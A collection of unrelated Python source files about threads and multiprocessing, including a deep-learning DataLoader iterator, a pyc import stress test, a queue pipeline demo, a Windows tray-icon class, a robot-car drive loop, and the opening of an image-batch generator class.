if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
# NOTE: _structrue_infos used to record the data structure of
# batch to restore batch structure after reading Tensor
# from blocking_queue in single-process mode. Note that
# only single process is used in single-process mode, we
# can record the data structure sequencely in a list without
# recording the send and recv index
self._structure_infos = []
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
try:
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
if self._thread_done_event.is_set():
break
self._blocking_queue.close()
self._shutdown_thread()
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._shutdown_thread()
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def __next__(self):
try:
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
six.reraise(*sys.exc_info())
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
# NOTE: blocking queue should be closed firstly for
# blocking queue read may hang and _thread_done_event
# cannot be checked
self._shutdown_thread()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# thread event is only need in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all worker as resume iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
# all flag will be check in _thread_loop, simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
# the blocking_queue cachees instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: in persistent workers mode, do not check data
# drained here, simply let it go to _data_queue
# reading to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
pyc_stress_test.py
|
# Note: CPython doesn't pass this test
import os
import sys
import multiprocessing
def worker():
global done
for i in xrange(100):
del sys.modules["pyc_import_target"]
import pyc_import_target
done = True
import pyc_import_target
path = os.path.join(os.path.dirname(__file__), "pyc_import_target.pyc")
assert os.path.exists(path)
TEST_THREADS = 3
l = []
for i in xrange(TEST_THREADS):
p = multiprocessing.Process(target=worker)
p.start()
l.append(p)
idx = 0
while l:
p = l.pop()
while p.is_alive():
for i in xrange(10):
if os.path.exists(path):
os.remove(path)
for i in xrange(10):
if os.path.exists(path):
with open(path, "rw+") as f:
f.write(chr(i) * 100)
f.truncate(200)
p.join()
assert p.exitcode == 0, p.exitcode
|
test.py
|
from multiprocessing.dummy import Process as Thread
from multiprocessing.dummy import Queue
import time
def func1(qm1, q12):
while True:
qget = qm1.get()
if qget is not None:
if qget is 'over':
q12.put('over')
break
print ('Thread1 recv: %s'%qget)
q12.put('1_%s'%(qget))
time.sleep(1)
def func2(q12, q23):
while True:
qget = q12.get()
if qget is not None:
if qget is 'over':
q23.put('over')
break
print ('Thread2 recv: %s'%qget)
q23.put('2_%s'%(qget))
time.sleep(0.7)
def func3(q23, q3m):
while True:
qget = q23.get()
if qget is not None:
if qget is 'over':
q3m.put('over')
break
print ('Thread3 recv: %s'%qget)
q3m.put('3_%s'%(qget))
time.sleep(1.3)
def main():
qm1 = Queue()
q12 = Queue()
q23 = Queue()
q3m = Queue()
t1 = Thread(target=func1,args=(qm1, q12))
t2 = Thread(target=func2,args=(q12, q23))
t3 = Thread(target=func3,args=(q23, q3m))
t1.start()
t2.start()
t3.start()
for i in range(100):
qm1.put('%d'%(i))
print ('Main send: %d'%i)
time.sleep(0.5)
qm1.put('over')
result = []
while True:
qget = q3m.get()
if qget is not None:
if qget is 'over':
break
result.append('m_%s'%(qget))
print ('Main recv: %s,%d'%(qget, len(result)))
t3.join()
t2.join()
t1.join()
if __name__ == "__main__":
main()
|
systrayicon.py
|
import os
import threading
import uuid
from copy import copy
from .win32_adapter import *
class MenuOption:
def __init__(self, text, icon_path=None, callback=None, submenu=None):
self.text = text
self.icon_path = icon_path
self.callback = callback
self.submenu = submenu
self.ftype = None
self.fstate = None
self.action_id = None
self.menu_handle = None
self.menu_position = None
def refresh(self):
pass
class CheckBoxMenuOption(MenuOption):
def __init__(self, *args, check_hook=None, **kwargs):
super().__init__(*args, **kwargs)
self.check_hook = check_hook
self._checked = False
self._get_checked()
def refresh(self):
self._get_checked()
if self.menu_handle is not None:
menu_item_checked = GetMenuState(self.menu_handle, self.menu_position, MF_BYPOSITION) & MFS_CHECKED
if self._checked != menu_item_checked:
u_check = MFS_CHECKED if self._checked else MFS_UNCHECKED
CheckMenuItem(self.menu_handle, self.menu_position, MF_BYPOSITION | u_check)
def _get_checked(self):
if self.check_hook and callable(self.check_hook):
self._checked = bool(self.check_hook())
@property
def fstate(self):
self._get_checked()
return MFS_CHECKED if self._checked else MFS_UNCHECKED
@fstate.setter
def fstate(self, value):
return # Does nothing
class SysTrayIcon(object):
"""
menu_options: list or tuple of MenuOption objects or tuples of (text, icon_path, callback)
text and tray hover text should be Unicode
hover_text length is limited to 128; longer text will be truncated
icon_path can be None
callback must be a callable or special action from SysTrayIcon.SPECIAL_ACTIONS
Can be used as context manager to enable automatic termination of tray
if parent thread is closed:
with SysTrayIcon(icon, hover_text) as systray:
for item in ['item1', 'item2', 'item3']:
systray.update(hover_text=item)
do_something(item)
"""
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
icon,
hover_text,
menu_options=None,
on_quit=None,
default_menu_index=None,
window_class_name=None,
error_handler=None):
self._icon = icon
self._icon_shared = False
self._hover_text = hover_text
self._on_quit = on_quit
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = dict()
self._menu_options = list()
self._prepare_menu_options(menu_options)
window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
self._error_handler = error_handler
self._default_menu_index = (default_menu_index or 0)
self._window_class_name = encode_for_locale(window_class_name)
self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
RegisterWindowMessageW("TaskbarCreated"): self._restart,
WM_DESTROY: self._destroy,
WM_CLOSE: self._destroy,
WM_COMMAND: self._command,
WM_USER+20: self._notify}
self._notify_id = None
self._message_loop_thread = None
self._hwnd = None
self._hicon = 0
self._hinst = None
self._window_class = None
self._menu = None
self._register_class()
def __enter__(self):
"""Context manager so SysTray can automatically close"""
self.start()
return self
def __exit__(self, *args):
"""Context manager so SysTray can automatically close"""
self.shutdown()
def WndProc(self, hwnd, msg, wparam, lparam):
hwnd = HANDLE(hwnd)
wparam = WPARAM(wparam)
lparam = LPARAM(lparam)
if msg in self._message_dict:
self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
return DefWindowProc(hwnd, msg, wparam, lparam)
def _register_class(self):
# Register the Window class.
self._window_class = WNDCLASS()
self._hinst = self._window_class.hInstance = GetModuleHandle(None)
self._window_class.lpszClassName = self._window_class_name
self._window_class.style = CS_VREDRAW | CS_HREDRAW
self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
self._window_class.hbrBackground = COLOR_WINDOW
self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
style = WS_OVERLAPPED | WS_SYSMENU
self._hwnd = CreateWindowEx(0,
self._window_class_name,
self._window_class_name,
style,
0,
0,
CW_USEDEFAULT,
CW_USEDEFAULT,
0,
0,
self._hinst,
None)
UpdateWindow(self._hwnd)
self._refresh_icon()
def _message_loop_func(self):
self._create_window()
PumpMessages()
def start(self):
if self._hwnd:
return # already started
self._message_loop_thread = threading.Thread(target=self._message_loop_func)
self._message_loop_thread.start()
def shutdown(self):
if not self._hwnd:
return # not started
PostMessage(self._hwnd, WM_CLOSE, 0, 0)
self._message_loop_thread.join()
def update(self, icon=None, hover_text=None):
""" update icon image and/or hover text """
if icon:
self._icon = icon
self._load_icon()
if hover_text:
self._hover_text = hover_text
self._refresh_icon()
def _prepare_menu_options(self, menu_options):
menu_options = menu_options or ()
if isinstance(menu_options, tuple):
menu_options = list(menu_options)
menu_options.append(MenuOption('Quit', callback=SysTrayIcon.QUIT))
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = dict()
self._menu_options = self._recompile_menu_options_with_ids(menu_options)
def _recompile_menu_options_with_ids(self, menu_options):
result = []
for menu_option in menu_options:
if isinstance(menu_option, tuple):
menu_option = MenuOption(*menu_option)
elif isinstance(menu_option, dict):
menu_option = MenuOption(**menu_option)
elif isinstance(menu_option, MenuOption):
menu_option = copy(menu_option)
else:
raise ValueError('Unknown menu option type', type(menu_option))
menu_option.action_id = self._next_action_id
submenu = menu_option.submenu or _non_string_iterable(menu_option.callback)
if callable(menu_option.callback) or menu_option.callback in SysTrayIcon.SPECIAL_ACTIONS:
self._menu_actions_by_id[menu_option.action_id] = menu_option.callback
elif submenu:
menu_option.submenu = self._recompile_menu_options_with_ids(submenu)
menu_option.callback = None
else:
raise Exception('Unknown item', menu_option.text, menu_option.icon_path, menu_option.callback)
result.append(menu_option)
self._next_action_id += 1
return result
def _load_icon(self):
# release previous icon, if a custom one was loaded
# note: it's important *not* to release the icon if we loaded the default system icon (with
# the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
if not self._icon_shared and self._hicon != 0:
DestroyIcon(self._hicon)
self._hicon = 0
# Try and find a custom icon
hicon = 0
if self._icon is not None and os.path.isfile(self._icon):
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
icon = encode_for_locale(self._icon)
hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
self._icon_shared = False
# Can't find icon file - using default shared icon
if hicon == 0:
self._hicon = LoadIcon(0, IDI_APPLICATION)
self._icon_shared = True
self._icon = None
def _refresh_icon(self):
if self._hwnd is None:
return
if self._hicon == 0:
self._load_icon()
if self._notify_id:
message = NIM_MODIFY
else:
message = NIM_ADD
self._notify_id = NotifyData(self._hwnd,
0,
NIF_ICON | NIF_MESSAGE | NIF_TIP,
WM_USER+20,
self._hicon,
self._hover_text)
Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
self._notify_id = None
self._refresh_icon()
def _destroy(self, hwnd, msg, wparam, lparam):
if self._on_quit:
self._on_quit(self)
nid = NotifyData(self._hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
PostQuitMessage(0) # Terminate the app.
if self._menu:
DestroyMenu(self._menu)
if self._hicon:
DestroyIcon(self._hicon)
self._hwnd = None
self._notify_id = None
def _notify(self, hwnd, msg, wparam, lparam):
if lparam == WM_LBUTTONDBLCLK:
self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
elif lparam == WM_RBUTTONUP:
self._show_menu()
elif lparam == WM_LBUTTONUP:
pass
return True
def _refresh_menu_options(self, menu_options=None):
if menu_options is None:
menu_options = self._menu_options
for menu_option in menu_options:
menu_option.refresh()
if menu_option.submenu:
self._refresh_menu_options(menu_option.submenu)
def _show_menu(self):
if self._menu is None:
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
# SetMenuDefaultItem(self._menu, 1000, 0)
self._refresh_menu_options()
pos = POINT()
GetCursorPos(ctypes.byref(pos))
# See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
SetForegroundWindow(self._hwnd)
TrackPopupMenu(self._menu,
TPM_LEFTALIGN,
pos.x,
pos.y,
0,
self._hwnd,
None)
PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
for position, menu_option in enumerate(menu_options):
option_icon = self._prep_menu_icon(menu_option.icon_path) if menu_option.icon_path else None
item_attributes = dict(text=menu_option.text,
hbmpItem=option_icon,
fType=menu_option.ftype,
fState=menu_option.fstate)
if menu_option.action_id in self._menu_actions_by_id:
item = PackMENUITEMINFO(**item_attributes, wID=menu_option.action_id)
elif menu_option.submenu is not None:
submenu = CreatePopupMenu()
self._create_menu(submenu, menu_option.submenu)
item = PackMENUITEMINFO(**item_attributes, hSubMenu=submenu)
else:
raise ValueError('Bad configured menu option: no action nor submenu found')
menu_option.menu_handle = menu
menu_option.menu_position = position
InsertMenuItem(menu, position, True, ctypes.byref(item))
@staticmethod
def _prep_menu_icon(icon):
icon = encode_for_locale(icon)
# First load the icon.
ico_x = GetSystemMetrics(SM_CXSMICON)
ico_y = GetSystemMetrics(SM_CYSMICON)
hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
hdcBitmap = CreateCompatibleDC(None)
hdcScreen = GetDC(None)
hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
hbmOld = SelectObject(hdcBitmap, hbm)
# Fill the background.
brush = GetSysColorBrush(COLOR_MENU)
FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
# draw the icon
DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
SelectObject(hdcBitmap, hbmOld)
# No need to free the brush
DeleteDC(hdcBitmap)
DestroyIcon(hicon)
return hbm
def _command(self, hwnd, msg, wparam, lparam):
_id = LOWORD(wparam)
self._execute_menu_option(_id)
def _execute_menu_option(self, action_id):
menu_action = self._menu_actions_by_id[action_id]
if menu_action == SysTrayIcon.QUIT:
DestroyWindow(self._hwnd)
else:
try:
menu_action(self)
except Exception as exc:
if self._error_handler and callable(self._error_handler):
self._error_handler(exc)
else:
raise
def _non_string_iterable(obj):
try:
iter(obj)
except TypeError:
return False
else:
return not isinstance(obj, str)
|
vehicle.py
|
import time
from threading import Thread
from .memory import Memory
from .log import get_logger
import time
logger = get_logger(__name__)
# TODO
## Should add the ultrasonic sensor as a part
## The ultrasonic sensor code should be in its won class
## maybe have the thread return a value rather than have it set the shouldStop variable
## make n_times an argument to Vehicle() and a CLI argument to manage.py
## Look into how GPIO actually works
## Modfiy the behavior of when you detect an object
## Add a way to easily add a customized action based on object detected
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = [] # Turn this into an array where the name is the key
self.on = True
self.threads = []
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None, name=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
i----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition: boolean
If a part should be run at all.
"""
p = part
logger.info('Adding part {}.'.format(p.__class__.__name__))
entry = dict()
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
entry['name'] = name
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def start(self, rate_hz=10, max_loop_count=None):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinit loop
that runs each part and updates the memory.
Parameter1s
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maxiumum number of loops the drive loop should execute. This is
used for testing the all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
logger.info('Starting vehicle...')
time.sleep(1)
loop_count = 0
#distance = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
"""
loop over all parts
"""
for entry in self.parts:
# don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
# print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
logger.info('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except Exception as e:
logger.debug(e)
|
generator.py
|
"""
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import random
import threading
import warnings
import threading
import queue
import keras
from ..utils.anchors import (
anchor_targets_bbox,
bbox_transform,
anchors_for_shape,
guess_shapes
)
from ..utils.image import (
TransformParameters,
adjust_transform_for_image,
apply_transform,
preprocess_image,
resize_image,
)
from ..utils.transform import transform_aabb
class Generator(object):
""" Abstract generator class.
"""
def __init__(
self,
transform_generator = None,
batch_size=1,
